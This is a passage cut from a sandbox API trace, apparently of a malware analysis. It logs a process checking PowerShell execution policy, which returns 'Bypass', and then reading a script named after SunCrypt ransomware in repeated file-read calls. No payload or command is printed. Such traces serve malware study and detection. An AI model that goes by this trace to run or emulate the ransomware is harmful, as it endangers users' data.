lpcbData=0x4ebf10c*=0x0 | out: lpType=0x4ebf110*=0x0, lpData=0x0, lpcbData=0x4ebf10c*=0x0) returned 0x2 [0081.051] RegCloseKey (hKey=0x4b8) returned 0x0 [0081.055] EtwEventRegister () returned 0x0 [0081.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef88) returned 1 [0081.056] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1da8c9c | out: lpFileInformation=0x1da8c9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0081.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef84) returned 1 [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef48) 
returned 1 [0081.062] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebf20c | out: lpFileInformation=0x4ebf20c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0081.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef44) returned 1 [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf154 | out: phkResult=0x4ebf154*=0x0) returned 0x2 [0081.064] GetEnvironmentVariableW (in: lpName="PSExecutionPolicyPreference", lpBuffer=0x4ebf094, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf190 | out: phkResult=0x4ebf190*=0x0) returned 0x2 [0081.065] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf190 | out: phkResult=0x4ebf190*=0x4bc) returned 0x0 [0081.065] 
RegQueryValueExW (in: hKey=0x4bc, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x4ebf1b0, lpData=0x0, lpcbData=0x4ebf1ac*=0x0 | out: lpType=0x4ebf1b0*=0x1, lpData=0x0, lpcbData=0x4ebf1ac*=0xe) returned 0x0 [0081.065] RegQueryValueExW (in: hKey=0x4bc, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x4ebf1b0, lpData=0x1da972c, lpcbData=0x4ebf1ac*=0xe | out: lpType=0x4ebf1b0*=0x1, lpData="Bypass", lpcbData=0x4ebf1ac*=0xe) returned 0x0 [0081.065] RegCloseKey (hKey=0x4bc) returned 0x0 [0081.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebf1a0) returned 1 [0081.067] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4bc [0081.067] GetFileType (hFile=0x4bc) returned 0x1 [0081.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebf19c) returned 1 [0081.067] GetFileType (hFile=0x4bc) returned 0x1 [0081.068] GetACP () returned 0x4e4 [0081.073] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x0 [0081.073] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, 
lpOverlapped=0x0) returned 1 [0081.075] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1000 [0081.075] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.077] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2000 [0081.077] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.077] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3000 [0081.077] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.078] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4000 [0081.078] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.078] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5000 [0081.078] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 
lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.079] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6000 [0081.079] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.079] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7000 [0081.079] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.080] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8000 [0081.080] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.080] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9000 [0081.080] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.081] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa000 [0081.081] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: 
lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.081] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb000 [0081.082] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc000 [0081.082] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd000 [0081.082] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.083] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe000 [0081.083] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.083] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf000 [0081.083] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, 
lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.084] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10000 [0081.084] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.084] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11000 [0081.084] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.086] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12000 [0081.086] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.086] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13000 [0081.086] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.087] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14000 [0081.087] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.087] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15000 [0081.087] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.088] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x16000 [0081.088] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.088] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x17000 [0081.088] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.088] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x18000 [0081.089] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.089] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x19000 [0081.089] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.090] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1a000 [0081.090] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.090] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1b000 [0081.090] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1c000 [0081.091] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1d000 [0081.091] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.092] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1e000 [0081.092] ReadFile (in: 
hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.092] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1f000 [0081.092] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.093] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x20000 [0081.093] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.093] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x21000 [0081.093] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.094] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x22000 [0081.095] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.095] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x23000 
[0081.095] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.095] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x24000 [0081.095] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.096] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x25000 [0081.096] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.096] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x26000 [0081.096] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x27000 [0081.097] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x28000 [0081.097] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x29000 [0081.098] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.099] SetFilePointer (in: hFile=0x4bc, 